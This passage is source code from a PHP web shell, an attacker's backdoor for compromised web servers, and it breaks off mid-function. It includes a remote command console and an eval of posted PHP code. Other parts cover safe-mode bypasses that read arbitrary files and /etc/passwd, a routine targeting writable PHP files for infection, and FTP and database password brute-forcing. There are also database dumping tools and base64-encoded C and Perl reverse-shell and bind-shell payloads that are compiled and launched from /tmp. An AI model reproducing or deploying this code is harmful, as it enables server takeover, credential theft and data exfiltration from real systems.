prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
if(isset($_POST['ajax'])) {
prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
ob_start();
echo "d.cf.cmd.value='';\n";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
if(@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "c_='".$GLOBALS['cwd']."';";
}
}
echo "d.cf.output.value+='".$temp."';";
echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit;
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
hardHeader();
echo "";
echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
';
echo '
';
hardFooter();
}
function actionPhp() {
if( isset($_POST['ajax']) ) {
$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
eval($_POST['p1']);
$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
echo strlen($temp), "\n", $temp;
exit;
}
hardHeader();
if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
echo '

PHP info

';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!body {.*}!msiU','',$tmp);
$tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
$tmp = preg_replace('!h1!msiU','h2',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
$tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
echo $tmp;
echo '

';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo '

Execution PHP-code

';
echo ' send using AJAX
';
if(!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo '
';
hardFooter();
}
function actionFilesMan() {
if (!empty ($_COOKIE['f']))
$_COOKIE['f'] = @unserialize($_COOKIE['f']);
if(!empty($_POST['p1'])) {
switch($_POST['p1']) {
case 'uploadFile':
if ( is_array($_FILES['f']['tmp_name']) ) {
foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {
if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {
echo "Can't upload file!";
}
}
}
break;
case 'mkdir':
if(!@mkdir($_POST['p2']))
echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path) {
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = opendir($path);
while ( ($▟ = readdir($dh) ) !== false) {
$▟ = $path.$▟;
if ( (basename($▟) == "..") || (basename($▟) == ".") )
continue;
$type = filetype($▟);
if ($type == "dir")
deleteDir($▟);
else
@unlink($▟);
}
closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f) {
if($f == '..')
continue;
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case 'paste':
if($_COOKIE['act'] == 'copy') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
} elseif(is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE['f'] as $f)
copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
} elseif($_COOKIE['act'] == 'move') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
} elseif(@is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE['f'] as $f)
@rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
} elseif($_COOKIE['act'] == 'zip') {
if(class_exists('ZipArchive')) {
$zip = new ZipArchive();
if ($zip->open($_POST['p2'], 1)) {
chdir($_COOKIE['c']);
foreach($_COOKIE['f'] as $f) {
if($f == '..')
continue;
if(@is_file($_COOKIE['c'].$f))
$zip->addFile($_COOKIE['c'].$f, $f);
elseif(@is_dir($_COOKIE['c'].$f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
foreach ($iterator as $key=>$value) {
$zip->addFile(realpath($key), $key);
}
}
}
chdir($GLOBALS['cwd']);
$zip->close();
}
}
} elseif($_COOKIE['act'] == 'unzip') {
if(class_exists('ZipArchive')) {
$zip = new ZipArchive();
foreach($_COOKIE['f'] as $f) {
if($zip->open($_COOKIE['c'].$f)) {
$zip->extractTo($GLOBALS['cwd']);
$zip->close();
}
}
}
} elseif($_COOKIE['act'] == 'tar') {
chdir($_COOKIE['c']);
$_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
chdir($GLOBALS['cwd']);
}
unset($_COOKIE['f']);
setcookie('f', '', time() - 3600);
break;
default:
if(!empty($_POST['p1'])) {
prototype('act', $_POST['p1']);
prototype('f', serialize(@$_POST['f']));
prototype('c', @$_POST['c']);
}
break;
}
}
hardHeader();
echo '

File manager

';
$dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; }
global $sort;
$sort = array('name', 1);
if(!empty($_POST['p1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
$sort = array($match[1], (int)$match[2]);
}
echo "

";
$dirs = $files = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i],
'path' => $GLOBALS['cwd'].$dirContent[$i],
'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != "."))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function cmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files, "cmp");
usort($dirs, "cmp");
$files = array_merge($dirs, $files);
$l = 0;
foreach($files as $f) {
echo '';
$l = $l?0:1;
}
echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms']
.'
R T'.(($f['type']=='file')?' F E D':'').'





";
if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
echo " file name:  ";
echo "
";
hardFooter();
}
function actionStringTools() {
if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i $stringTools = array(
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'binhex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
);
if(isset($_POST['ajax'])) {
prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
ob_start();
if(in_array($_POST['p1'], $stringTools))
echo $_POST['p1']($_POST['p2']);
$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
echo strlen($temp), "\n", $temp;
exit;
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
hardHeader();
echo '

String conversions

';
echo "
send using AJAX
";
if(!empty($_POST['p1'])) {
if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo"

Search files:







Text:
Path:
Name:
";
function hardRecursiveGlob($path) {
if(substr($path, -1) != '/')
$path.='/';
$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
if(is_array($paths)&&@count($paths)) {
foreach($paths as $▟) {
if(@is_dir($▟)){
if($path!=$▟)
hardRecursiveGlob($▟);
} else {
if(empty($_POST['p2']) || @strpos(file_get_contents($▟), $_POST['p2'])!==false)
echo "".htmlspecialchars($▟)."
";
}
}
}
}
if(@$_POST['p3'])
hardRecursiveGlob($_POST['c']);
echo "

Search for hash:










";
hardFooter();
}
function actionSafeMode() {
$temp='';
ob_start();
switch($_POST['p1']) {
case 1:
$temp=@tempnam($test, 'cx');
if(@copy("compress.zlib://".$_POST['p2'], $temp)){
echo @file_get_contents($temp);
unlink($temp);
} else
echo 'Sorry... Can\'t open file';
break;
case 2:
$files = glob($_POST['p2'].'*');
if( is_array($files) )
foreach ($files as $filename)
echo $filename."\n";
break;
case 3:
$ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
curl_exec($ch);
break;
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST['p2']);
break;
case 5:
for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
$uid = @posix_getpwuid($_POST['p2']);
if ($uid)
echo join(':',$uid)."\n";
}
break;
case 6:
if(!function_exists('imap_open'))break;
$stream = imap_open($_POST['p2'], "", "");
if ($stream == FALSE)
break;
echo imap_body($stream, 1);
imap_close($stream);
break;
}
$temp = ob_get_clean();
hardHeader();
echo '

Safe mode bypass

';
echo 'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
';
if($temp)
echo '
'.$temp.'
';
echo '
';
hardFooter();
}
function actionLogout() {
setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
die("
THANK YOU & BYE


©opy®ight :
Twepl & mIcHy
");
}
function actionSelfRemove() {
if($_POST['p1'] == 'yes')
if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
die('Shell has been removed');
else
echo 'unlink error!';
if($_POST['p1'] != 'yes')
hardHeader();
echo '

Suicide

Really want to remove the shell?
Yes
';
hardFooter();
}
function actionInfect() {
hardHeader();
echo '

Infect

';
if($_POST['p1'] == 'infect') {
$target=$_SERVER['DOCUMENT_ROOT'];
function ListFiles($dir) {
if($dh = opendir($dir)) {
$files = Array();
$inner_files = Array();
while($file = readdir($dh)) {
if($file != "." && $file != "..") {
if(is_dir($dir . "/" . $file)) {
$inner_files = ListFiles($dir . "/" . $file);
if(is_array($inner_files)) $files = array_merge($files, $inner_files);
} else {
array_push($files, $dir . "/" . $file);
}
}
}
closedir($dh);
return $files;
}
}
foreach (ListFiles($target) as $key=>$file){
$nFile = substr($file, -4, 4);
if($nFile == ".php" ){
if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
echo "$file
";
$i++;
}
}
}
echo "$i";
}else{
echo "
";
echo 'Really want to infect the server? Yes
';
}
hardFooter();
}
function actionBruteforce() {
hardHeader();
if( isset($_POST['proto']) ) {
echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
';
if( $_POST['proto'] == 'ftp' ) {
function bruteForce($ip,$port,$login,$pass) {
$fp = @ftp_connect($ip, $port?$port:21);
if(!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif( $_POST['proto'] == 'mysql' ) {
function bruteForce($ip,$port,$login,$pass) {
$res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);
@mysql_close($res);
return $res;
}
} elseif( $_POST['proto'] == 'pgsql' ) {
function bruteForce($ip,$port,$login,$pass) {
$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if( is_array($temp) )
foreach($temp as $line) {
$line = explode(":", $line);
++$attempts;
if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
$success++;
echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
';
}
if(@$_POST['reverse']) {
$tmp = "";
for($i=strlen($line[0])-1; $i>=0; --$i)
$tmp .= $line[0][$i];
++$attempts;
if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
$success++;
echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp);
}
}
}
} elseif($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if( is_array($temp) )
foreach($temp as $line) {
$line = trim($line);
++$attempts;
if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
$success++;
echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
';
}
}
}
echo "Attempts: $attempts Success: $success

";
}
echo '

FTP bruteforce

'
.''
.''
.''
.''
.''
.''
.'
Type
'
.''
.''
.''
.''
.'Server:port
Brute type /etc/passwd
reverse (login -> nigol)
Dictionary
'
.''
.''
.'
Login
Dictionary
'
.'
';
echo '
';
hardFooter();
}
function actionSql() {
class DbClass {
var $type;
var $link;
var $res;
function __construct($type) {
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type) {
case 'mysql':
if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
break;
case 'pgsql':
$host = explode(':', $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
break;
}
return false;
}
function selectdb($db) {
switch($this->type) {
case 'mysql':
if (@mysql_select_db($db))return true;
break;
}
return false;
}
function query($str) {
switch($this->type) {
case 'mysql':
return $this->res = @mysql_query($str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch() {
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type) {
case 'mysql':
return @mysql_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs() {
switch($this->type) {
case 'mysql':
return $this->query("SHOW databases");
break;
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
}
return false;
}
function listTables() {
switch($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
break;
}
return false;
}
function error() {
switch($this->type) {
case 'mysql':
return @mysql_error();
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str) {
switch($this->type) {
case 'mysql':
if(function_exists('mysql_set_charset'))
return @mysql_set_charset($str, $this->link);
else
$this->query('SET CHARSET '.$str);
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str) {
switch($this->type) {
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
break;
case 'pgsql':
$this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;");
$r=array();
while($i=$this->fetch())
$r[] = $i['file'];
$this->query('drop table hard2');
return array('file'=>implode("\n",$r));
break;
}
return false;
}
function dump($table, $fp = false) {
switch($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
$create = mysql_fetch_array($res);
$sql = $create[1].";\n";
if($fp) fwrite($fp, $sql); else echo($sql);
$this->query('SELECT * FROM `'.$table.'`');
$i = 0;
$head = true;
while($▟ = $this->fetch()) {
$sql = '';
if($i % 1000 == 0) {
$head = true;
$sql = ";\n\n";
}
$columns = array();
foreach($▟ as $k=>$v) {
if($v === null)
$▟[$k] = "NULL";
elseif(is_int($v))
$▟[$k] = $v;
else
$▟[$k] = "'".@mysql_real_escape_string($v)."'";
$columns[] = "`".$k."`";
}
if($head) {
$sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $▟).')';
$head = false;
} else
$sql .= "\n\t,(".implode(", ", $▟).')';
if($fp) fwrite($fp, $sql); else echo($sql);
$i++;
}
if(!$head)
if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
break;
case 'pgsql':
$this->query('SELECT * FROM '.$table);
while($▟ = $this->fetch()) {
$columns = array();
foreach($▟ as $k=>$v) {
$▟[$k] = "'".addslashes($v)."'";
$columns[] = $k;
}
$sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $▟).');'."\n";
if($fp) fwrite($fp, $sql); else echo($sql);
}
break;
}
return false;
}
};
$db = new DbClass($_POST['type']);
if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
switch($_POST['charset']) {
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
}
if(empty($_POST['file'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach($_POST['tbl'] as $v)
$db->dump($v);
exit;
} elseif($fp = @fopen($_POST['file'], 'w')) {
foreach($_POST['tbl'] as $v)
$db->dump($v, $fp);
fclose($fp);
unset($_POST['p2']);
} else
die('');
}
hardHeader();
echo "

Sql browser












TypeHostLoginPasswordDatabase
";
$tmp = "";
if(isset($_POST['sql_host'])){
if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
switch($_POST['charset']) {
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
}
$db->listDbs();
echo "';
}
else echo $tmp;
}else
echo $tmp;
echo "
count the number of rows

";
if(isset($db) && $db->link){
echo "
";
if(!empty($_POST['sql_base'])){
$db->selectdb($_POST['sql_base']);
echo "";
}
echo "
Tables:

";
$tbls_res = $db->listTables();
while($▟ = $db->fetch($tbls_res)) {
list($key, $value) = each($▟);
if(!empty($_POST['sql_count']))
$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
$value = htmlspecialchars($value);
echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
";
}
echo "
File path:
";
if(@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "".$_POST['p2']." ({$num['n']} records) Page # ";
echo " of $pages";
if($_POST['p3'] > 1)
echo " < Prev";
if($_POST['p3'] < $pages)
echo " Next >";
$_POST['p3']--;
if($_POST['type']=='pgsql')
$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
else
$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
echo "

";
}
if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
$db->query(@$_POST['p2']);
if($db->res !== false) {
$title = false;
echo '';
$line = 1;
while($▟ = $db->fetch()) {
if(!$title) {
echo '';
foreach($▟ as $key => $value)
echo '';
reset($▟);
$title=true;
echo '';
$line = 2;
}
echo '';
$line = $line==1?2:1;
foreach($▟ as $key => $value) {
if($value == null)
echo '';
else
echo '';
}
echo '';
}
echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
';
} else {
echo '
Error: '.htmlspecialchars($db->error()).'
';
}
}
echo "

";
echo "

";
if($_POST['type']=='mysql') {
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
if($db->fetch())
echo "
Load file
";
}
if(@$_POST['p1'] == 'loadfile') {
$file = $db->loadFile($_POST['p2']);
echo '
'.htmlspecialchars($file['file']).'
';
}
} else {
echo htmlspecialchars($db->error());
}
echo '
';
hardFooter();
}
function actionNetwork() {
hardHeader();
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo "

Network tools



Bind port to /bin/sh

Port: Password: Using:


Back-connect to

Server: Port: Using:

";
if(isset($_POST['p1'])) {
function cf($f,$t) {
$w=@fopen($f,"w") or @function_exists('file_put_contents');
if($w) {
@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
@fclose($w);
}
}
if($_POST['p1'] == 'bpc') {
cf("/tmp/bp.c",$bind_port_c);
$▖ = ex("gcc -o /tmp/bp /tmp/bp.c");
@unlink("/tmp/bp.c");
$▖ .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
echo "
$▖".ex("ps aux | grep bp")."
";
}
if($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl",$bind_port_p);
$▖ = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
echo "
$▖".ex("ps aux | grep bp.pl")."
";
}
if($_POST['p1'] == 'bcc') {
cf("/tmp/bc.c",$back_connect_c);
